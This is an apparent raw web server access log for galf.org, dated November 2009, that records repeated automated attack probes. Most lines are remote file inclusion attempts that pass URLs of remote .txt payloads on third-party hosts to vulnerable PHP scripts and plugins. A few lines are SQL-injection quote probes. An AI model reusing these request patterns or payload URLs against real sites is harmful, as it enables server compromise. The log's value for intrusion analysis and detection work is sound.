67.228.191.194 - - [01/Nov/2009:19:45:58 -0800] "GET /logs/access_090309.log%20%20/?INCLUDE_FOLDER=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:19:46:20 -0800] "GET /logs/access_090914.log%20%20/?INCLUDE_FOLDER=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:19:46:26 -0800] "GET /logs/access_090309.log%20%20/?INCLUDE_FOLDER=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:19:46:38 -0800] "GET /logs/access_090914.log%20%20/?INCLUDE_FOLDER=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [01/Nov/2009:19:47:25 -0800] "GET /logs/access_091012.log///vwar/backup/errors.php?error=http://h1.ripway.com/aurel12/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [01/Nov/2009:19:47:25 -0800] "GET /logs///vwar/backup/errors.php?error=http://h1.ripway.com/aurel12/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [01/Nov/2009:19:47:25 -0800] "GET //vwar/backup/errors.php?error=http://h1.ripway.com/aurel12/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [01/Nov/2009:19:47:28 -0800] "GET /logs//skin/uks_gallery_v3010/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [01/Nov/2009:19:47:28 -0800] "GET /skin/uks_gallery_v3010/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [01/Nov/2009:19:47:28 -0800] "GET /logs/access_090831.log//skin/uks_gallery_v3010/write.php?dir=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:19:50:10 -0800] "GET /logs/access.log%20%20//login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
208.89.214.167 - - [01/Nov/2009:19:50:10 -0800] "GET /logs//login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
208.89.214.167 - - [01/Nov/2009:19:50:11 -0800] "GET /login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
208.89.214.167 - - [01/Nov/2009:19:50:41 -0800] "GET /logs//login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
208.89.214.167 - - [01/Nov/2009:19:50:41 -0800] "GET /logs/access.log%20%20//login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
208.89.214.167 - - [01/Nov/2009:19:50:41 -0800] "GET /login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
207.14.32.241 - - [01/Nov/2009:19:51:45 -0800] "GET /setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:51:45 -0800] "GET /logs//setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:51:46 -0800] "GET /logs/access_090824.log//setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
98.202.220.151 - - [01/Nov/2009:19:52:02 -0800] "GET /logs/access_090824.log//setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
98.202.220.151 - - [01/Nov/2009:19:52:03 -0800] "GET /setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
98.202.220.151 - - [01/Nov/2009:19:52:03 -0800] "GET /logs//setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:52:17 -0800] "GET /logs/access_090817.log//setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:19:52:47 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:19:52:47 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:19:52:49 -0800] "GET /skin/zero_vote/error.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [01/Nov/2009:19:53:06 -0800] "GET //vwar/backup/errors.php?error=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [01/Nov/2009:19:53:06 -0800] "GET /logs/access_091012.log///vwar/backup/errors.php?error=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [01/Nov/2009:19:53:06 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:19:53:29 -0800] "GET /logs/access_090427.log%20%20//skin/zero_vote/error.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:55:06 -0800] "GET /setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:55:06 -0800] "GET /logs//setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:55:08 -0800] "GET /logs/access_090824.log//setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
207.14.32.241 - - [01/Nov/2009:19:55:45 -0800] "GET /logs/access_090817.log//setup.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:20:01:02 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
208.89.214.167 - - [01/Nov/2009:20:03:28 -0800] "GET /logs/access_090928.log//skin/zero_vote/error.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:20:03:41 -0800] "GET /logs/access_090427.log//skin/zero_vote/error.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:20:05:52 -0800] "GET /login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:20:05:53 -0800] "GET /logs/access_090706.log//login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:20:05:53 -0800] "GET /logs//login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:20:06:00 -0800] "GET /logs/access_090511.log//login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:20:06:20 -0800] "GET /logs/access_090706.log//login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:20:06:20 -0800] "GET /login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:20:06:21 -0800] "GET /logs//login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:20:06:27 -0800] "GET /logs/access_090511.log//login.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.251.99.2 - - [01/Nov/2009:20:07:41 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
125.251.99.2 - - [01/Nov/2009:20:07:42 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
125.251.99.2 - - [01/Nov/2009:20:07:46 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
125.251.99.2 - - [01/Nov/2009:20:07:55 -0800] "GET /logs/access_091012.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.251.99.2 - - [01/Nov/2009:20:07:55 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.251.99.2 - - [01/Nov/2009:20:07:56 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:20:12:16 -0800] "GET /logs/access_090504.log//skin/zero_vote/error.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:19:57 -0800] "GET /board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:19:57 -0800] "GET /logs//board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:19:57 -0800] "GET /logs/access.log//board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:20:49 -0800] "GET /logs/access.log%20%20//view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:20:49 -0800] "GET /logs//view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:20:49 -0800] "GET /view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:21:00 -0800] "GET /board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:21:00 -0800] "GET /logs//board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:21:01 -0800] "GET /logs/access.log//board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:21:02 -0800] "GET /logs//view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:21:02 -0800] "GET /view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:21:02 -0800] "GET /logs/access.log%20%20//view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.163.197.88 - - [01/Nov/2009:20:21:03 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.163.197.88 - - [01/Nov/2009:20:21:03 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.163.197.88 - - [01/Nov/2009:20:21:03 -0800] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.163.197.88 - - [01/Nov/2009:20:21:34 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.200.237.152 - - [01/Nov/2009:20:21:58 -0800] "GET /logs/access_090406.log//mcf.php?content=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.200.237.152 - - [01/Nov/2009:20:21:58 -0800] "GET /mcf.php?content=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.200.237.152 - - [01/Nov/2009:20:21:58 -0800] "GET /logs//mcf.php?content=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.200.237.152 - - [01/Nov/2009:20:22:02 -0800] "GET /logs/access_090907.log//mcf.php?content=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:22:21 -0800] "GET /logs/access.log%20%20//board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:20:22:33 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:20:22:51 -0800] "GET /logs/access_091012.log//skin/zero_vote/error.php?dir=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.163.197.88 - - [01/Nov/2009:20:23:28 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.163.197.88 - - [01/Nov/2009:20:23:28 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.163.197.88 - - [01/Nov/2009:20:23:28 -0800] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:23:54 -0800] "GET /board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:23:54 -0800] "GET /logs//board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:23:54 -0800] "GET /logs/access.log%20%20//board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.163.197.88 - - [01/Nov/2009:20:24:06 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:24:13 -0800] "GET /logs/access.log%20%20//board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:24:28 -0800] "GET /logs/access.log//view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.200.237.152 - - [01/Nov/2009:20:24:39 -0800] "GET /mcf.php?content=' HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
222.236.47.182 - - [01/Nov/2009:20:24:49 -0800] "GET /logs/access_090608.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [01/Nov/2009:20:24:49 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [01/Nov/2009:20:24:49 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:24:51 -0800] "GET /logs/access.log//board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:24:51 -0800] "GET /logs//board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:24:51 -0800] "GET /board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:25:14 -0800] "GET /logs/access.log//view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:25:58 -0800] "GET /logs//board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:25:58 -0800] "GET /logs/access.log//board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:25:58 -0800] "GET /board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:26:45 -0800] "GET /logs/access.log//board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:26:48 -0800] "GET /board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:26:48 -0800] "GET /logs/access.log%20%20//board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:26:49 -0800] "GET /logs//board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:26:55 -0800] "GET /logs/access.log%20%20//board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:28:10 -0800] "GET /logs/access.log%20%20//board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:20:29:54 -0800] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:20:29:54 -0800] "GET /logs/access_090921.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:20:29:54 -0800] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:20:29:54 -0800] "GET /logs/access_091012.log%20%20////?DOCUMENT_ROOT=http://www.trznica.rimava.sk/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:20:29:54 -0800] "GET /logs////?DOCUMENT_ROOT=http://www.trznica.rimava.sk/baner.txt? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:20:29:54 -0800] "GET ///?DOCUMENT_ROOT=http://www.trznica.rimava.sk/baner.txt? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
67.228.191.194 - - [01/Nov/2009:20:30:14 -0800] "GET /logs/access.log//board//skin/sirini_ezset_fullpack/view.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [01/Nov/2009:20:30:34 -0800] "GET /logs/access_090810.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.163.197.88 - - [01/Nov/2009:20:30:44 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.163.197.88 - - [01/Nov/2009:20:30:50 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [01/Nov/2009:20:31:15 -0800] "GET /logs/access_090525.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.195.115.176 - - [01/Nov/2009:20:31:28 -0800] "GET /labia/ HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.163.197.88 - - [01/Nov/2009:20:31:32 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.163.197.88 - - [01/Nov/2009:20:31:47 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://otsmotrel.ru/blog/NewFile.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.192.251.146 - - [01/Nov/2009:20:32:19 -0800] "GET /logs/access_091012.log%20%20////?DOCUMENT_ROOT=http://www.trznica.rimava.sk/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.192.251.146 - - [01/Nov/2009:20:32:19 -0800] "GET ///?DOCUMENT_ROOT=http://www.trznica.rimava.sk/baner.txt? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
67.192.251.146 - - [01/Nov/2009:20:32:19 -0800] "GET /logs////?DOCUMENT_ROOT=http://www.trznica.rimava.sk/baner.txt? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:20:33:39 -0800] "GET ///?DOCUMENT_ROOT=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 200 1049 "-" "libwww-perl/5.832" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:20:34:25 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
